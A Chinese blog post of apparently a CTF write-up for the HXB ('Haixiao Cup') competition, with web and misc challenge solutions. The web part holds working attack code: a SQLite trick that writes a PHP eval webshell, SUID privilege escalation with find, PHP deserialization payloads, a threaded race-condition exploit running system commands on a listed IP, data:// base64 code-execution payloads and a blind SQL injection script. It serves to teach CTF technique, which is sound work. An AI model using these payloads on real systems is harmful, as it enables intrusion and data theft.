海啸杯hxb

最新推荐文章于 2024-06-14 09:22:46 发布
最新推荐文章于 2024-06-14 09:22:46 发布
阅读量1k 收藏
点赞数
分类专栏: CTF比赛题目复现 文章标签: 1024程序员节 php 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62107966/article/details/127491238
版权

web\nwelcome to 海啸杯\n查看源代码,拿到flag。\n\nHXBCTF{welcome _to_HXB}\n极客邀请函\n考点:SQLite get shell、SUID提权\n\n查看网页源码,看到注释里的PHP代码\n\n\u003C?php\nclass MyDB extends SQLite3\n{\nfunction __construct()\n{\n$this->open('./test.db');\n}\n}\n$db = new MyDB();\nif(!$db){\necho $db->lastErrorMsg();\n} else {\necho \"Opened database successfully\\n\";\n}\n​\nif($POST[\"cmd\"]!=NULL)\n{\nif(strpos($POST[\"cmd\"],'system')!==false){\necho 'HACK不准哦 达咩 达咩哦';\n}else{\necho '执行成功';\n$db->exec($POST[\"cmd\"]);*\n}\n}\n?>\nSQLite还可以生成任意后缀名的数据库文件 创建一个 shell.php 的数据库文件,新建一个名为 exp 的表,并在表中插入: \u003C?php @eval($POST[1]); ?> ,即一句话木马\n\nATTACH DATABASE 'shell.php' AS hxbctf; create TABLE hxbctf.exp (dataz text);\ninsert INTO hxbctf.exp (dataz) VALUES ('\u003C?php eval($_POST[\"cmd\"])?>');\n用蚁剑连接:\n\n发现flag在/tmp目录下,但没有权限查看,使用suid提权 利用find找到有SUID权限\n\nfind / -user root -perm -4000 -exec ls -ldb {} \\;\nfind文件所属者和所属组都为root用户,使用find命令可以执行其它的系统命令,因此可以使用find命 令运行whoami查看当前用户\n\nfind 1 -exec whoami \\;\n使用find获取flag\n\nfind 1 -exec cat /tmp/flag \\;\n参考文章:\n\n一文让你深刻理解什么是suid提权_Nddey的博客-CSDN博客_suid提权\n\ninfant_serialize\nAtuhor:eeknight\n\n考点:PHP反序列化原生类利用、wakeup绕过\n\n题目描述:反了反了\n\n \u003C?php\nheader(\"Content-Type: text/html; charset=utf-8\");\nerror_reporting(0);\n​\nclass dalao{\n   public $class;\n   public $para;\n   public $check;\n   public $status=\"heike\";\n   public function __construct()\n   {\n       $this->class = \"hunzi\";\n       $this->para = \"luansha\";\n       echo new $this->class ($this->para);\n   }\n   public function __wakeup() {\n           $this->status=\"dalao\";\n   }\n​\n   public function __destruct()\n   {\n       if($this->status!=\"dalao\"){\n           $this->check = new jingcha;\n           if($this->check->filter($this->para) && $this->check->filter($this->class)) {\n               echo new $this->class ($this->para);\n           }\n           else\n               die('有黑客,抓起来!!!!');\n       }\n       else\n           die(\"欢迎大佬!!!!!!!\");\n   }\n​\n}\nclass hunzi{\n   var $a;\n   public function __construct($a)\n   {\n       $this->a = $a;\n       echo (\"hello \".$this->a);\n   }\n}\nclass jingcha{\n   function filter($code){\n       $pattern = '/[|\\'*|=|\"|;|?]/i';\n       if (preg_match($pattern, $code)){\n           return false;\n       }\n       else\n           return true;\n   }\n}\n​\n​\nif(isset($_GET['dalao'])){\n   unserialize(base64_decode($_GET['dalao']));\n}\nelse{\n   highlight_file(__FILE__);\n}   \n遍历得到flag名字 ,使用原生类FilesystemIterator。\n\n\u003C?php\nclass dalao{\npublic $class='FilesystemIterator';\npublic $para=\"/var/www/html\";\npublic $check;\n}\n$zh = new dalao();\n$zh= serialize($zh);\n$zh = str_replace(':3:',':4:',$zh); \necho base64_encode($zh);\n得到42177812215a92ea1ad9b7d61a1787e8.php,即为flag所在的文件,\n\n接着读取,使用原生类SplFileObject:\n\n\u003C?php\nclass dalao{\npublic $class='SplFileObject';\npublic $para=\"/var/www/html/42177812215a92ea1ad9b7d61a1787e8.php\";\npublic $check;\n}\n$zh = new dalao();\n$zh= serialize($zh);\n$zh = str_replace(':3:',':4:',$zh); \necho base64_encode($zh);\n小小web\n考点:md5绕过、伪协议\n\n \u003C?php\nhighlight_file(__FILE__);\nfunction random(){\n   $a = rand(188,34)*34;\n   $b = rand(13,9);\n   return $a+$b;\n}\n$r = random();\nif((string)$_GET['a']==(string)md5($_GET['b'])){\n   $a=$_GET['a'];\n   $b=md5($_GET['b']);\n   if($a.$r == $b){\n       echo \"yes\".\"\\n\";\n       if(preg_match('/php|file|\\/\\/|sftp|http|https|gopher/is', $_GET['c'])){\n           die(\"hack\");\n       }\n       else{\n           $c = file_get_contents($_GET['c']);\n           eval($c);\n       }\n   }\n} \n$r = random();if((string)$_GET['a']==(string)md5($_GET['b'])){ $a=$_GET['a']; $b=md5($_GET['b']); if($a.$r == $b){\n有一个random方法,返回的是一个随机数,在这道题中,不需要清楚返回的是什么内容,我们只要知道返回的是一串数字就可以了。传入两个参数a和b,要求传入的是字符串,b会经过md5加密。最后要让$a.$r == $b。因为是弱类型比较,且只能传入字符串,想要的是两个0e开头的字符串进行比较,因为$b是参数b经过md5加密而来,所以我们传入md5加密后是0e开头的字符串即可。\n\n构造a,b如下\n\n?a=0e123221&b=s1502113478a&c=/var/www/html/flag.PHP%0a\n $c = file_get_contents($_GET['c']);     eval($c);\n刚开始以为直接将路径传给c,eval输出flag。。。\n\n后来发现正则绕不过去,/is 匹配所有字符及换行符。\n\n联想到题目 你就爆吧你。。应该是\n\n第一种解法:\n\nPHP_SESSION_UPLOAD_PROGRESS文件包含利用\n\n的知识点了来绕过。文件竞争命令执行拿flag。\n\n上传一个自定义的内容临时文件,传入eval,进行rec即可。\n\nexp:\n\nimport io\nimport requests\nimport threading\nimport time \n​\ndef poc(session):\n   global event\u003C?=\n   while True:\n       f = io.BytesIO(b'a' * 1024 * 50)\n       resp = session.post( 'http://121.37.24.208:63738/?a=0e11&b=s1502113478a&cmd=system(\"cat%20/var/www/html/42177812215a92ea1ad9b7d61a1787e8.php\");&c=/tmp/sess_bbbbbbb', data={'PHP_SESSION_UPLOAD_PROGRESS': ' ?>\u003C?php echo 44*44;eval($_GET[cmd]);echo 44*44;?>'}, files={'file': ('1.txt',f)}, cookies={'PHPSESSID': 'bbbbbbb'} )\n       while resp.status_code==429:\n           time.sleep(0.3)\n           resp = session.post( 'http://121.37.24.208:63738/?a=0e11&b=s1502113478a&cmd=system(\"cat%20/var/www/html/42177812215a92ea1ad9b7d61a1787e8.php\");&c=/tmp/sess_bbbbbbb', data={'PHP_SESSION_UPLOAD_PROGRESS': ' ?>\u003C?php echo 44*44;eval($_GET[cmd]);echo 44*44;?>'}, files={'file': ('1.txt',f)}, cookies={'PHPSESSID': 'bbbbbbb'} )\n       print(resp.text[resp.text.find('\u003C/code>yes'):])\n​\n​\n​\nif __name__==\"__main__\":\n   event=threading.Event()\n   with requests.session() as session:\n       for i in range(1,30): \n           threading.Thread(target=poc,args=(session,)).start()\n​\n运行得到flag。\n\n第二种:\n\ndata协议data:text/plain file_get_contents拼接伪协议\n\n虽然过滤了//,但是data:text/plain也可以用。\n\nc3lzdGVtKCJscyIpOw==   //system(\"ls\");base64编码查看目录\n?a=0e123221&b=s1502113478a&c=data:text/plain;base64,c3lzdGVtKCJscyIpOw==;\n发现42177812215a92ea1ad9b7d61a1787e8.php\n\n读取flag:\n\nsystem(\"cat /var/www/html/42177812215a92ea1ad9b7d61a1787e8.php\");\n注意 ;不要漏掉\n\nbase加密为:\n\nc3lzdGVtKCJjYXQgL3Zhci93d3cvaHRtbC80MjE3NzgxMjIxNWE5MmVhMWFkOWI3ZDYxYTE3ODdlOC5waHAiKTs=\n?a=0e123221&b=s1502113478a&c=data:text/plain;base64,c3lzdGVtKCJjYXQgL3Zhci93d3cvaHRtbC80MjE3NzgxMjIxNWE5MmVhMWFkOWI3ZDYxYTE3ODdlOC5waHAiKTs=;\n扫一扫\n信息泄露,disrearch扫描发现有www.zip,直接打开失败,拖到010拿到flag。\n\nHXBCTF{message_leak_is_dangerous!}\n​\nhappy_sql\nsql,盲注脚本编写。\n\nimport re\nimport requests\nurl=\"http://121.37.24.208:58125/\"\nflag=\"\"\ni=0\nwhile True:\n small=32\n big=127\n i=i+1\n while small\u003Cbig:\n mid=small+big>>1\n data = {\n 'height':f\"0 or (select case when ord(mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),{i},1)) > {mid} then 1 else 0 end)\"}\n # 'height':f\"0 or (select case when ord(mid((select flag from happy_sql),{i},1)) > {mid} then 1 else 0 end)\"\n \n r=requests.post(url,data=data)\n if 'img/duochidian.jpg' in r.text:\n small=mid+1\n else:\n big =mid\n if(re.search(\"}\",flag)):\n break\n else:\n print(chr(small))\n flag+=chr(small)\nprint(flag)\nmisc\n套娃\n码多次base,知道是base16、base32、base64,根据它们的字符集,写个脚本逐层解码\n\n脚本破解即可:\n\nimport base64\nwith open(\"Base套娃.txt\", \"r\") as f:\n r = f.read()\nwhile True:\n try:\n r = base64.b16decode(r)\n print(\"base16\")\n except:\n try:\n r = base64.b32decode(r)\n print(\"base32\")\n except:\n try:\n r = base64.b64decode(r)\n print(\"base64\")\n except:\n pass\n if b\"hxbctf\" in r:\n print(r)\n break\n藏在云朵的二维码\nStegsolve 文件合成,发现有个二维码,接着就选择较为清晰的两张图疯狂合成,使得二维码清楚一点,最后扫描即可拿到flag。\n\n新时代保安\nStegsolve 选择不同的通道查看,即可拿到flag:\n\n我的银行卡密码是:xxxx\n使用archpr.exe对压缩包密码进行爆破,得出是987654。\n\n解压得到一张图片:\n\n也是放到Stegsolve ,选择不同的通道,lsb隐写 查找得到flag。

泪涌@
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
181118 逆向-HXB2018(Reverse)
whklhhhh的博客
11-19 1054
这次的re难度不是太大……但是re2和re3都有点偏门,不太硬核233 但也挺有意思的 Replace upx -d脱壳,然后是一个比普通签到略复杂一点的签到题,没什么好说的 要求table[input[i]] == atoi(data[2*i]+data[2*i+1])^0x19 table = [0x63, 0x7C, 0x77, 0x7B, 0xF2, 0x6B, 0x6F, 0xC5, 0...
[2020hxb] 部分wp
qq_42158602的博客
11-03 360
web web1 题目名字不重要反正题挺简单的 就在phpinfo里面 。。。。 源码放一下 感觉200分没这么好拿的样子,可能有别的解法。 <?php error_reporting(0); //I heard you are good at PHPINFO+LFI, flag is in flag.php, find it my dear noob vegetable hacker. if ( isset($_GET['file']) ) { $file = $_GET['file'];
hxb海啸
m0_62107966的博客
10-24 1189
查看源代码,拿到flag。
第二届海啸杯部分题目Writeup
SkYe's Blog
10-21 864
第二届海啸杯部分题目Writeup 文章目录第二届海啸杯部分题目WriteupMisc签到题flag老烟枪flag表白flag小明的求助flag密码学恺撒将军flag小明家的小菜园flag战报flagreversebaby reverseflageasy reverseflag霸王别姬flag电竞选手flagPwnshellcode脚本simple_stackoverflow脚本 Misc 签到题...
湖湘杯hxb_pwn
Trick的博客
11-08 156
湖湘杯hxb_pwn pwn_printf pwn_libc ida 16次循环 下面if判断v12<=0x20 所以写 for i in range(16): n.sendline("32") 跟进if下面的函数 这里变量的栈是空栈0h,所以offset只需要64bit程序的8个就行。 再然后a * a1,所以传参需要double 0x20,也就是0x40 ROPgadget --binary pwn_printf 找到pop_rdi_ret的地址 复习一下libc64_payload公式
hxb 2017 部分题解
StriveBen的博客
12-04 580
0x00 前言作为一名菜鸡,挤出了一点时间来做了做今年的湖湘杯,快结束的时候看了看题目,就做出了三道题,和大家分享下。0x01 第一题 web200拿道题目本以为是文件上传,但是试了几个方法没成功,随便点了点,看到了url中op参数,感觉是php文件包含漏洞 试了试,得到了index.php的源码0x02 使用php://filter 读取源码在使用php:filter协议获取源码时,需要注意”r
【湖湘杯2018】第一次写wp就写个贼水的吧。。。
KingJerry的博客
11-19 639
昨天去考英语六级口语然后在外面浪一天,然后突然想起来好像有个比赛23333333 匆匆忙忙赶回来已经迟了。。。 行吧。。。   1、题目名 Welcome   关注公众号回复可得flag   2、题目名Disk  先用FTK扫描文件   发现四个flag文件将所有二进制复制下来 01100110011011000110000101100111011110110011...
2017湖湘杯 pwn300
weixin_45966329的博客
02-28 151
2017湖湘杯 pwn300 该题为简单栈溢出,利用方法如下: (1)覆盖返回地址为read函数读入shellcode (2)执行mprotect让bss段的地址变的可执行 (3)跳转shellcode执行即可 from pwn import * context(os='linux',arch='x86',log_level='debug') io=remote("node3.buuoj.cn",29028) #io=process("pwn300") elf=ELF('pwn300') def add
2017年湖湘杯复赛 pwn100-writeup
aptx4869_li的博客
12-22 1120
2017年湖湘杯复赛 pwn100-writeup 这是本人第一次做出来pwn的题可能有些地方显得比较笨,但尽量把自己所想的每一步都描述清楚。不足之处请批评指正。
c代码-HXB测试代码
07-16
c代码-HXB测试代码
2017湖湘杯pwn300
12-03
2017湖湘杯pwn300的题目,请大家自行下载。。。。。。
WanAndroid-HXB::high_voltage:致力于打造一款极致体验的 http
05-01
Awesome-WanAndroid致力于打造一款极致体验的WanAndroid客户端,知识和美是可以并存的哦QAQn(≧▽≦)n ,更好的 Awesome-WanAndroid V1.2.1正式版发布,相比初始版本,项目的稳定性和界面的美化程度已提升了几个档次...
PHP异常处理的最佳实践及常见问题解决
NatLindsay的博客
06-11 263
异常处理的基本原理是,当try块中的代码发生异常时,PHP会寻找匹配的catch块进行处理,如果没有找到对应的catch块,则异常会向上传递直至被处理为止。PHP异常处理是在开发过程中至关重要的一环,它能够帮助开发人员捕获和处理程序运行过程中的错误和异常情况,提高代码的稳定性和可靠性。在实际开发中,可能会遇到各种各样的异常处理问题,比如异常未被捕获、异常信息不清晰、异常处理性能问题等。合理地使用自定义异常类能够使异常处理更加灵活和规范化,有助于统一异常信息和错误码,提高代码的可维护性和可读性。
源码编译安装LAMP
潇的博客
06-12 827
LAMP 架构是目前成熟的企业网站应用模式之一,指的是协同工作的一整套系统和相关软件,能够提供动态Web站点服务及其应用开发环境。LAMP是一个缩写词,具体包括Linux操作系统、Apache网站服务器、MySQL数据库服务器、PHP(或Perl、Python)网页编程语言。本章将以源码编译的方式搭建LAMP环境,能够满足企业定制化的需求。在构建LAMP平台时,各组件的安装顺序依次为Linux、Apache、MySQL、PHP。其中Apache和MySQL的安装并没有严格的顺序;
无回显XXE攻击:隐秘的数据泄露技术
最新发布
weixin_43822401的博客
06-14 363
无回显XXE攻击是一种隐蔽的数据泄露手段,攻击者可以在不引起目标服务器注意的情况下获取敏感信息。了解这种攻击的原理和防御策略对于保护网络安全至关重要。通过本文的介绍,希望读者能够提高对无回显XXE攻击的认识,并采取相应的防护措施。
软考初级网络管理员_07_网络单选题
2301_80961833的博客
06-12 903
部分主机无法与该DHCP服务器正常通信,这些主机客户端系统自动生成了169.254.0.0范围内的地址。部分主机无法与该DHCP服务器正常通信,这些主机客户端系统自动生成了127.254.0.0范围内的地址。通过ARP协议可以获取目的端的MAC地址和UUID的地址。你必须先接入Internet,别人才可以给你发送电子邮件。只要你的E-Mai 地址有效,别人就可以给你发送电子邮件。你只有打开了自己的计算机,别人才可以给你发送电子邮件。关于虚拟局域网,下面的描述中错误的是()。
网络安全练气篇——PHP编程语言基础
weixin_55762309的博客
06-13 918
(外文名:PHP:Hypertext Preprocessor,中文名:“超文本预处理器”) 是一种通用开源脚本语言。语法吸收了C语言、Java和Perl的特点,利于学习,使用广泛,主要适用于Web开发领域。用PHP做出的动态页面与其他的编程语言相比,PHP是将程序嵌入到HTML(标准通用标记语言下的一个应用) 文档中去执行,执行效率比完全生成HTML标记的CGI要高许多,PHP还可以执行编译后代码,编译可以达到加密和优化代码运行,使代码运行更快。
最新大屏幕互动系统PHP源码 附动态背景图和配乐素材 含搭建教程
爱酷码的博客
06-10 247
最新大屏幕互动系统PHP源码 附动态背景图和配乐素材 含搭建教程。测试环境:Nginx+PHP7.0+MySQL5.6。
解释 @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @ WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED! @ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY! Someone could be eavesdropping on you right now (man-in-the-middle attack)! It is also possible that a host key has just been changed. The fingerprint for the ECDSA key sent by the remote host is SHA256:m3wBHtrT0HXb0H04qPLqemg72SavVieqXYS6WAaBlxQ. Please contact your system administrator. Add correct host key in /root/.ssh/known_hosts to get rid of this message. Offending ECDSA key in /root/.ssh/known_hosts:3 ECDSA host key for xn01 has changed and you have requested strict checking. Host key verification failed. lost connection
06-01
这是一个SSH连接时出现的警告信息,意思是远程主机的身份验证发生了变化,可能是因为主机密钥被更改或者中间人攻击(man-in-the-middle attack)。出于安全原因,SSH客户端不会继续连接,需要手动确认主机密钥是否...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值